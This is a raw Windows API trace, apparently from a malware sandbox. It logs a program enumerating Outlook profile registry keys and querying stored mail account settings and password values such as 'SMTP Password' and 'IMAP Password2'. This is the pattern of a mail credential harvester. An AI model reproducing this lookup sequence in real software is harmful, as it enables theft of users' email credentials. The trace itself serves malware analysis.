[0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.315] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.315] RegCloseKey (hKey=0x95c) returned 0x0 [0249.315] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.316] RegCloseKey (hKey=0x95c) returned 0x0 [0249.316] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.316] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.317] RegCloseKey (hKey=0x95c) returned 0x0 [0249.317] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.317] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.318] RegCloseKey (hKey=0x95c) returned 0x0 [0249.318] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.318] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.319] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] LocalFree (hMem=0x5d67220) returned 0x0 [0249.319] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0xd, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.319] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.319] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d66960 [0249.319] wsprintfA (in: param_1=0x5d66960, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.319] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.319] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.319] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.319] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.319] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.319] RegCloseKey (hKey=0x95c) returned 0x0 [0249.319] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.320] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) 